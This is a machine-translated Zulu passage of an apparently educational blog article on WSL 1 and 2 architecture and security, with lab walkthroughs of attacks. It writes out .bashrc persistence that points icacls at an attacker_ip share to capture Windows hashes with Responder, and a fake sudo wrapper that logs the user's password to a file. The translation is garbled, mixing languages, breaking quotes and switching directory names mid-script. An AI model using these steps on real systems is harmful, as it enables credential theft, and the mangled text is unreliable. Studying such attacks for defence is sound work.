🥇Ukuhlolwa kwe-WSL. Isiqephu 1

Sawubona, habr! I-OTUS yethula uhlelo olusha lwezifundo ngo-Okthoba "Ukuphepha" Linux». Njengoba silindele ukuqala kwezifundo, sabelana nawe ngesihloko esibhalwe omunye wothisha bethu, u-Alexander Kolesnikov.

Ngo-2016, iMicrosoft yethula ubuchwepheshe obusha be-WSL emphakathini we-IT (Windows Subsystem ye Linux), okwagcina kuvumela ukuhlanganiswa kwabancintisani ababengavumelani ngaphambili ababelwela ukuthandwa phakathi kwabasebenzisi be-OS abavamile nabathuthukile: Windows и LinuxLobu buchwepheshe bunikeze ikhono lokusebenzisa amathuluzi e-OS. Linux uzungezwe Windows ngaphandle kwesidingo sokuqalisa Linux, isibonelo, ukusebenzisa ama-multi-boot. Ku-Habr, ungathola izihloko eziningi ezichaza izinzuzo zokusebenzisa i-WSL. Kodwa-ke, ngeshwa, ngesikhathi sokubhala, azikho izifundo mayelana nokuphepha kwalokhu kusebenzisana kwezinhlelo zokusebenza ezitholakale kulo mthombo. Lokhu okuthunyelwe kuwumzamo wokulungisa lokhu. Isihloko sizoxoxa ngezici zezakhiwo ze-WSL 1 kanye no-2 futhi sihlaziye izibonelo eziningana zokuhlaselwa kwezinhlelo ezisebenzisa lobu buchwepheshe. Isihloko sihlukaniswe izingxenye ezimbili. Esokuqala sizokwethula izindlela eziyinhloko zokuhlasela. Linux и WindowsIsihloko sesibili sizokhuluma ngokusetha indawo yokuhlola kanye nokuhlasela okuphindaphindayo.

I-WSL 1: izici zezakhiwo

Ukuze uqonde ngokugcwele izinkinga zokuphepha ze-WSL, kubalulekile ukuhlonza izici ezibalulekile ezihambisana nokusetshenziswa kwesistimu engaphansi. Esinye sezidingo zomsebenzisi eziyinhloko ezibhekwa yi-WSL ukuvumela ukufinyelela kwetheminali. Linux izinhlelo ku-host ene-OS WindowsFuthi, ukuhambisana okunikezwayo kwakungokwemvelo kangangokuthi amafayela asebenzisekayo Linux (ELF) ingaqaliswa ngqo ohlelweni WindowsUkufeza lezi zinhloso ku Windows 10 kwadalwa uhlelo oluncane olukhethekile oluvumela izinhlelo zokusebenza ukuthi ziqaliswe Linux kusetshenziswa isethi yezingcingo ezithile zesistimu - ngakho-ke, kwenziwa umzamo wokwenza imephu yesethi yama-syscalls Linux on WindowsNgokwemvelo, lokhu kwaqaliswa ngokungeza abashayeli abasha kanye nefomethi entsha yenqubo. Ngokubukeka, ukwakheka kwale ndlela kwakubukeka kanje:

Ngokuyisisekelo, ukusebenzisana nesistimu yokusebenza Linux yahlelwa kusetshenziswa amamojula amaningana e-kernel kanye nohlobo olukhethekile lwenqubo—i-pico. Umdwebo ongenhla ubonisa ukuthi inqubo isebenza kulesi sibonelo Linux ku-host, kumele kube ngokomdabu futhi kumele kusetshenziswe izinsiza ezifanayo nezinhlelo zokusebenza ezivamile WindowsKodwa lokhu kungafezwa kanjani? Kuphrojekthi I-Drawbridge imiqondo yenqubo yathuthukiswa ukuze Windows, enikeze zonke izingxenye zesistimu yokusebenza ezidingekayo (kuye ngokuthi inguqulo yayo) ukuze kusebenze uhlelo lokusebenza oluvela kwenye i-OS.

Qaphela ukuthi ukucashunwa okuhlongozwayo kwenze kwaba nokwenzeka ukungathembeli ohlelweni lokusebenza (ikakhulukazi, Windows), elindele ukuthi kuqalwe enye inqubo ye-OS, futhi iphakamise indlela evamile.

Ngakho-ke, noma yiluphi uhlelo lokusebenza ngaphakathi kwenqubo ye-pico lungasebenza ngaphandle kokubheka i-kernel. Windows:

Izinkinga zokuhambisana nokuhunyushwa kwezingcingo zesistimu kufanele zixazululwe ngabahlinzeki abakhethekile;
Ukulawulwa kokufinyelela kumele kusetshenziswe nge-Security Monitor. I-monitor itholakala ku-kernel ngakho-ke Windows Kwakudingeka ukuthuthukiswa ngesimo somshayeli omusha ongasebenza njengomhlinzeki wezinqubo ezinjalo. Inqubo ye-prototype pico iboniswe ngokwesimiso ngezansi:

Ngoba uhlelo lwefayela Linux isebenzisa amagama amafayela nezinhlu zemibhalo ebucayi, Windows Kufakwe izinhlobo ezimbili zesistimu yamafayela ukuze zisetshenziswe ne-WSL: i-VolFS kanye ne-DriveFS. I-VolFS iwukusetshenziswa kwesistimu yamafayela. Linux, i-DriveFS uhlelo lwefayela olusebenza ngokwemithetho Windows, kodwa inenketho yokukhetha ukuzwela kwezimpawu zamagama.

I-WSL 2

I-WSL 1 yayinemikhawulo eminingana eyayiyivimbela ukuthi ingasetshenziswa ekuxazululeni imisebenzi eminingi kakhulu: isibonelo, yayingenalo ikhono lokusebenzisa i-32-bit. Linux Izinhlelo zokusebenza azikwazanga ukusebenzisa abashayeli bedivayisi. Ngakho-ke, ngo-2020, i-WSL 2 yakhululwa, eyashintsha indlela yokwakha uhlelo olungaphansi. I-WSL 2 ingumshini obonakalayo olungiselelwe kahle ohambisana nezici zokusetshenziswa kwezinsiza ze-WSL 1. Manje, kuye ngezinkinga umsebenzisi azixazululayo, i-OS Windows, ungakhetha inguqulo edingekayo yesistimu engaphansi ukuze usebenze ngayo LinuxUkuze kuncishiswe ubuthakathaka obungaba khona, i-WSL 2 yasetshenziswa ngokusekelwe ku-Hyper-V ku Windows 10Kuleli fomu Windows inekhono lokusebenzisa i-kernel yesistimu yokusebenza iyodwa LinuxKuhle ukukhumbula ukuthi inguqulo 1 ye-WSL yethulwa njengesici se-beta esihloselwe ukukhombisa indlela yokuthuthukiswa. Windows kule ndawo, ngakho-ke ukushintshela ku-Hyper-V kwakungenakugwenywa. Ukwakheka kokugcina kubukeka kanje:

Kule nguqulo, ama-kernel esistimu Windows и Linux Ngayinye inezinsiza zayo kanye nokugqagqana kwayo ngaphakathi kwesistimu yamafayela kuphela, kodwa lokhu kugqagqana akukapheleli nhlobo. Ukuxhumana phakathi kwezinhlelo zamafayela kufezwa nge-client-server wrapper esebenza kuphrothokholi ye-9P.

Namuhla iMicrosoft inikeza amandla okushintsha phakathi kwe-WSL 1 ne-WSL 2. Zombili izinguqulo ziyatholakala ukuze zisetshenziswe.

Ukuphepha kwe-WSL

Okwamanje, kunemisebenzi eminingana echaza izindlela ezithile zokusebenzisa amathuluzi e-OS asemthethweni ukuhlasela ukuxhumana phakathi kwamasistimu angaphansi. Sizosebenzisa imibhalo yabo ukuhlola ukufaneleka kokuhlaselwa ngesikhathi sokubhala. Uhlu olujwayelekile lokuhlaselwa nezimo:

1. Ukuqaliswa kwesistimu yefayela: amalungelo okufinyelela, ukutholakala kwezinkomba ezabiwe/izindlela zokushintshanisa idatha.

Ucwaningo lwenziwe ukuze kutholwe ukwephulwa kwemithetho yokufinyelela kusuka Linux FS->Windows FS, Windows FS->Linux FS. Ucwaningo lubonise amandla okushintsha ifayela elinikeziwe ngaphakathi kwe-OS eqondiwe. Kuphinde kwenziwa imizamo yokufaka esikhundleni, ukudala izimpinda kanye nokususa ingxenye yezinhlelo zamafayela.

Isimo:

A. Ukuhlaselwa okuvela ohlelweni lokusebenza Windows — ukuguqulwa kwamafayela kusuka kufolda ye-/etc ye-OS Linux.
B. Ukuhlaselwa okuvela ohlelweni lokusebenza Linux — ukuguqulwa kwamafayela kuzinkomba: C:Windows, C:Program Files, C:Users<User>

2. Ukusetshenziswa kwesitaki senethiwekhi.

Ucwaningo lwenziwe kusetshenziswa izibonelo zokuhlaselwa okuvela ohlelweni lokusebenza Linux on WindowsIzici zokusebenza ze-network stack zasetshenziswa, ikakhulukazi izindlela zayo zokuqinisekisa izinsiza ezahlukahlukene.

Isimo:

Ukuvula ukufinyelela echwebeni elimatasa ohlelweni Windows
Ukuvula ichweba ngaphandle kwamalungelo afanelekile
Ukusebenzisa igobolondo elibuyela emuva usebenzisa ifayela le-elf ohlelweni lokusebenza Windows.

3. Ukufihla ukwethulwa kwezinqubo zesofthiwe ezinonya kusetshenziswa isistimu engaphansi ye-WSL.

Ucwaningo belusekelwe eqinisweni elilula - izinhlelo ezingaphansi zokuphepha azikwazi ukuvimba izehlakalo kwenye i-kernel esebenza kusetshenziswa umhlinzeki osemthethweni osuka ohlelweni lokusebenza esimweni se-WSL 1. Esimeni se-WSL 2, ayikho indlela yokubuka izehlakalo ezenzekayo. ku-kernel ehlukile ngaphakathi komshini we-virtual ongasindi.

Isimo:

1) Yethula uhlelo lokusebenza lokufinyelela kude ohlelweni futhi ubuke imicimbi engeniwe.

Ukuhlolwa kwe-WSL 1: Ukuntshontsha i-Hash (OS) Windows)

Ekugcineni sesifinyelele engxenyeni esebenzayo. Okokuqala, sidinga ukuhlela indawo yokuhlola. Zonke izivivinyo zizokwenziwa ebhentshini lokuhlola eline Windows 10 2004. Isithombe sesistimu yokusebenza esikhethwe yi-WSL sasingu Ubuntu 18.04 Ephreli. Isithombe sakhethwa ngokungahleliwe, futhi noma yisiphi esinye sizosebenza kahle. Imiyalelo yokusetha isiteji:

Kufanele uqale uqalise powershell.exe njengomlawuli.

Ku-WSL 1 udinga ukusebenzisa imiyalo:

Nika amandla-WindowsIsici Ongasikhetha -Ku-inthanethi -Igama Lesici Microsoft-Windows-Uhlelo olungaphansi-Linux #Vumela isici se-WSL
Isicelo se-Invoke-WebRequest -Uri aka.ms/wsl-ubuntu-1804

-OutFile ~/Ubuntu.appx -UseBasicParsing #Layisha isithombe Linux kusuka ku-Microsoft Store

Ubuntuukufaka kwe-.appx —root #Faka isithombe

Kungase kudingeke ukuthi uchofoze inqubo yokusetha futhi udale umsebenzisi omusha onamalungelo amancane kunezimpande. Ezivivinyweni zethu, lokhu kuzoba i-sam yomsebenzisi evamile.

Qala kabusha-Ikhompuyutha #Qalisa kabusha

Ngemva kokuqalisa kabusha ukusetha, ungaqalisa umyalo we-bash. Uma konke kusebenze kahle, uzobona umphumela ofana nalokhu kukhonsoli. Windows:

Sizosebenzisa ukusatshalaliswa kweKali njengomshini womhlaseli. Linux, yonke imishini kumele ibe kunethiwekhi efanayo yendawo.

Ake sithi sinokufinyelela okungenamalungelo ku-WSL emshinini WindowsAke sizame ukuhlasela uhlelo lokusebenza. Linux, ebiza umyalo ovela ku- LinuxUkuze siqalise ukuhlasela, sizosebenzisa indlela elula yokuqalisa ngokuzenzakalelayo—sizofaka iskripthi sethu endaweni ezungezile. LinuxUkuze wenze lokhu, udinga ukushintsha ifayela .bashrc.

Emshinini one-WSL senza:

	1. bash
	2. Переходим в домашнюю директорию пользователя: cd /home/sam/
	2. echo  «/home/sam/.attack.sh» >> .bashrc
	3. echo «icalcs.exe » \\\\attacker_ip\\shareName\\» > /dev/null 2>&1» >> .attack.sh
	4. chmod u+x .attack.sh
	5. exit

Ngemoto kaKali Linux senza:

1. Responder -I eth0 -rdvw

Ngemoto Windows Ake sigijime i-bash.

Silinde imiphumela emshinini weKali. Linux:

Ngakho-ke sithole ama-hashes abasebenzisi Windows ngokusebenzisa uhlelo olungaphansi lwe-WSL ngokusebenzisa umyalo ohlelweni Linux.

Ukuhlolwa kwe-WSL 1: Ukuthola Iphasiwedi Yomsebenzisi (OS) Linux)

Asenze esinye isilingo. Phakathi nalokhu kuhlola sizokwengeza kufayela .bashrc imiyalo eminingana yokuthola iphasiwedi yomsebenzisi wesistimu yokusebenza Linux.

Masiqalise i-bash bese sifaka imiyalo:

1. mkdir .hidden
2. echo "export PATH=$HOME/.hidden/:$PATH:" >> .bashrc
3. echo "read -sp "[sudo] password for $USER: " sudopass" > .hidden/sudo
4. echo "echo """ >> .mysudo/sudo
5. echo "sleep 2" >> .mysudo/sudo
6. echo "echo "Sorry, try again."" >> .mysudo/sudo
7. echo "echo $sudopass >> /home/sam/.mysudo/pass.txt» >> .mysudo/sudo
8. echo "/usr/bin/sudo $@" >> .mysudo/sudo
9. chmod +x .mysudo/sudo
10. exit

Ukuze ukuhlasela kuphumelele, umsebenzisi uSam kumele abize i-sudo ku-terminal. LinuxNgemva kwalokhu, iphasiwedi yomsebenzisi we-OS Linux kuzoba sefayelini pass.txt:

Ukuqaliswa kokuhlaselwa kwanikezwa ulwazi lwethiyori kuphela.

Ingxenye elandelayo ye-athikili izochaza ukuqaliswa kwephrothokholi ye-9P, cabangela ukwakhiwa kwesithwebuli sale phrothokholi, futhi wenze ukuhlasela usebenzisa.